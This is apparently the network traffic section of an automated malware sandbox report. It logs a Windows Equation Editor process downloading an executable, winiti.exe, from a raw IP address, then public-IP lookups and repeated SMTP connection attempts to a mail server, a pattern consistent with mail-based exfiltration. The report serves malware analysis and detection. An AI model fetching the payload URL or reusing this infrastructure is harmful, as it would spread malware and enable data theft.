Jul 26, 2024 06:39:09.421868086 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.421885967 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.421919107 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.421942949 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.499764919 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.499960899 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.499977112 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.500014067 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.500022888 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.500051022 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.500053883 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.500093937 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.500200987 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.500256062 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.500391006 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.500425100 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.500437021 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.500459909 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.500509024 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.500756979 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.500790119 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.500812054 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.500823021 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.500837088 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.500865936 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.500925064 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.500983953 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.500983953 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.501019001 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.501025915 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.501063108 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.501616955 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.501674891 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.501786947 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.501821041 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.501842976 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.501853943 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.501878023 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.501888037 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.501899004 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.501924038 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.501930952 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.501960039 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.501970053 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.502091885 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.502810001 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.502845049 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.502862930 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.502878904 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.502890110 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.502912998 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.502919912 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.502953053 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.503012896 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.503046036 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.503065109 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.503079891 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.503089905 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.503120899 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.503798008 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.503833055 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.503850937 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.503865004 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.503875971 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.503900051 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.503911018 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.503936052 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.503943920 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.503971100 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.503974915 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.504010916 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.504703999 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.504738092 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.504755974 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.504770994 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.504780054 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.504805088 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.504808903 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.504837990 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.504841089 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.504872084 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.504877090 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.504905939 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.504906893 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.504946947 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.505789042 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.505821943 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.505846024 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.505875111 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.505944967 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.505979061 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.506002903 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.506012917 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.506022930 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.506048918 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.506066084 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.506082058 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.506088972 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.506134987 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.506634951 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.506669998 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.506690025 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.506701946 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.506722927 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.506736040 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.506742001 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.506769896 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.506782055 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.506802082 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.506805897 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.506843090 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.507482052 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.507524014 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.507539034 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.507575035 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.507577896 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.507621050 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.507625103 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.507654905 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.507673979 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.507687092 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.507693052 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.507720947 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.507731915 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.507755041 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.507766962 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.507788897 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.507797003 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.507823944 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.507832050 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.507857084 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.507872105 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.507890940 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.507896900 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.507925034 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.507930994 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.507960081 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.507962942 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.507993937 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.508002043 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.508025885 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.508030891 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.508060932 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.508064985 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.508093119 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.508097887 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.508126020 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.508130074 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.508160114 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.508162975 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.508193016 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.508198977 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.508233070 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.510211945 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.510246038 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.510276079 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.510297060 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.510303020 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.510330915 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.510339022 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.510364056 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.510376930 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.510409117 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.510483980 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.510515928 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.510538101 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.510550022 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.510567904 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.510591984 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.511184931 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.511218071 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.511240005 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.511250973 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.511266947 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.511296034 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.511338949 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.511370897 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.511383057 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.511404991 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.511437893 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.511454105 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.511470079 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.511476040 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.511512041 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.512140036 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.512173891 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.512195110 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.512221098 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.512305975 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.512337923 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.512357950 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.512371063 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.512381077 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.512404919 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.512417078 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.512438059 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.512456894 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.512510061 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.512512922 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.512542963 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.512557983 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.512576103 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.512583971 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.512608051 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.512612104 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.512643099 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.512645960 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.512677908 CEST	80	49163	198.46.174.139	192.168.2.22
Jul 26, 2024 06:39:09.512682915 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:09.512753963 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:10.137722015 CEST	49163	80	192.168.2.22	198.46.174.139
Jul 26, 2024 06:39:13.627728939 CEST	49164	443	192.168.2.22	172.67.74.152
Jul 26, 2024 06:39:13.627783060 CEST	443	49164	172.67.74.152	192.168.2.22
Jul 26, 2024 06:39:13.627835035 CEST	49164	443	192.168.2.22	172.67.74.152
Jul 26, 2024 06:39:13.633869886 CEST	49164	443	192.168.2.22	172.67.74.152
Jul 26, 2024 06:39:13.633893967 CEST	443	49164	172.67.74.152	192.168.2.22
Jul 26, 2024 06:39:14.141546965 CEST	443	49164	172.67.74.152	192.168.2.22
Jul 26, 2024 06:39:14.141609907 CEST	49164	443	192.168.2.22	172.67.74.152
Jul 26, 2024 06:39:14.160516977 CEST	49164	443	192.168.2.22	172.67.74.152
Jul 26, 2024 06:39:14.160531044 CEST	443	49164	172.67.74.152	192.168.2.22
Jul 26, 2024 06:39:14.161057949 CEST	443	49164	172.67.74.152	192.168.2.22
Jul 26, 2024 06:39:14.243372917 CEST	49164	443	192.168.2.22	172.67.74.152
Jul 26, 2024 06:39:14.284534931 CEST	443	49164	172.67.74.152	192.168.2.22
Jul 26, 2024 06:39:14.362374067 CEST	443	49164	172.67.74.152	192.168.2.22
Jul 26, 2024 06:39:14.362473965 CEST	443	49164	172.67.74.152	192.168.2.22
Jul 26, 2024 06:39:14.362518072 CEST	49164	443	192.168.2.22	172.67.74.152
Jul 26, 2024 06:39:14.368165970 CEST	49164	443	192.168.2.22	172.67.74.152
Jul 26, 2024 06:39:15.311827898 CEST	49165	25	192.168.2.22	208.91.199.224
Jul 26, 2024 06:39:18.318244934 CEST	49165	25	192.168.2.22	208.91.199.224
Jul 26, 2024 06:39:24.324280024 CEST	49165	25	192.168.2.22	208.91.199.224
Jul 26, 2024 06:39:36.322304010 CEST	49165	25	192.168.2.22	208.91.199.225
Jul 26, 2024 06:39:39.331513882 CEST	49165	25	192.168.2.22	208.91.199.225
Jul 26, 2024 06:39:45.337544918 CEST	49165	25	192.168.2.22	208.91.199.225
Jul 26, 2024 06:39:57.350238085 CEST	49165	25	192.168.2.22	208.91.199.223
Jul 26, 2024 06:40:00.360569000 CEST	49165	25	192.168.2.22	208.91.199.223
Jul 26, 2024 06:40:06.366482019 CEST	49165	25	192.168.2.22	208.91.199.223
Jul 26, 2024 06:40:18.378848076 CEST	49165	25	192.168.2.22	208.91.198.143
Jul 26, 2024 06:40:21.389352083 CEST	49165	25	192.168.2.22	208.91.198.143
Jul 26, 2024 06:40:27.395339012 CEST	49165	25	192.168.2.22	208.91.198.143

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 06:39:13.601883888 CEST	54562	53	192.168.2.22	8.8.8.8
Jul 26, 2024 06:39:13.611968040 CEST	53	54562	8.8.8.8	192.168.2.22
Jul 26, 2024 06:39:13.612134933 CEST	54562	53	192.168.2.22	8.8.8.8
Jul 26, 2024 06:39:13.619060040 CEST	53	54562	8.8.8.8	192.168.2.22
Jul 26, 2024 06:39:15.289864063 CEST	52917	53	192.168.2.22	8.8.8.8
Jul 26, 2024 06:39:15.299308062 CEST	53	52917	8.8.8.8	192.168.2.22
Jul 26, 2024 06:39:15.301516056 CEST	62751	53	192.168.2.22	8.8.8.8
Jul 26, 2024 06:39:15.311512947 CEST	53	62751	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 26, 2024 06:39:13.601883888 CEST	192.168.2.22	8.8.8.8	0x9366	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 06:39:13.612134933 CEST	192.168.2.22	8.8.8.8	0x9366	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Jul 26, 2024 06:39:15.289864063 CEST	192.168.2.22	8.8.8.8	0x1521	Standard query (0)	smtp.jlahuachem.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 06:39:15.301516056 CEST	192.168.2.22	8.8.8.8	0x1675	Standard query (0)	smtp.jlahuachem.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 26, 2024 06:39:13.611968040 CEST	8.8.8.8	192.168.2.22	0x9366	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Jul 26, 2024 06:39:13.611968040 CEST	8.8.8.8	192.168.2.22	0x9366	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Jul 26, 2024 06:39:13.611968040 CEST	8.8.8.8	192.168.2.22	0x9366	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Jul 26, 2024 06:39:13.619060040 CEST	8.8.8.8	192.168.2.22	0x9366	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Jul 26, 2024 06:39:13.619060040 CEST	8.8.8.8	192.168.2.22	0x9366	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Jul 26, 2024 06:39:13.619060040 CEST	8.8.8.8	192.168.2.22	0x9366	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Jul 26, 2024 06:39:15.299308062 CEST	8.8.8.8	192.168.2.22	0x1521	No error (0)	smtp.jlahuachem.com	us2.smtp.mailhostbox.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 06:39:15.299308062 CEST	8.8.8.8	192.168.2.22	0x1521	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)	false
Jul 26, 2024 06:39:15.299308062 CEST	8.8.8.8	192.168.2.22	0x1521	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)	false
Jul 26, 2024 06:39:15.299308062 CEST	8.8.8.8	192.168.2.22	0x1521	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)	false
Jul 26, 2024 06:39:15.299308062 CEST	8.8.8.8	192.168.2.22	0x1521	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)	false
Jul 26, 2024 06:39:15.311512947 CEST	8.8.8.8	192.168.2.22	0x1675	No error (0)	smtp.jlahuachem.com	us2.smtp.mailhostbox.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 06:39:15.311512947 CEST	8.8.8.8	192.168.2.22	0x1675	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)	false
Jul 26, 2024 06:39:15.311512947 CEST	8.8.8.8	192.168.2.22	0x1675	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)	false
Jul 26, 2024 06:39:15.311512947 CEST	8.8.8.8	192.168.2.22	0x1675	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)	false
Jul 26, 2024 06:39:15.311512947 CEST	8.8.8.8	192.168.2.22	0x1675	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

198.46.174.139

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49163	198.46.174.139	80	3244	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 06:39:08.334826946 CEST	314	OUT	GET /71/winiti.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 198.46.174.139 Connection: Keep-Alive
Jul 26, 2024 06:39:08.861911058 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 04:39:08 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Thu, 25 Jul 2024 06:32:44 GMT ETag: "a4000-61e0c90002b33" Accept-Ranges: bytes Content-Length: 671744 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 11 d2 a1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e0 09 00 00 40 00 00 00 00 00 00 42 fd 09 00 00 20 00 00 00 00 0a 00 00 00 40 00 00 20 00 00 00 20 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0a 00 00 20 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f0 fc 09 00 4f 00 00 00 00 00 0a 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf0@B @ @ @O H.textH `.rsrc @@.reloc @B
Jul 26, 2024 06:39:08.861965895 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 26, 2024 06:39:08.862008095 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
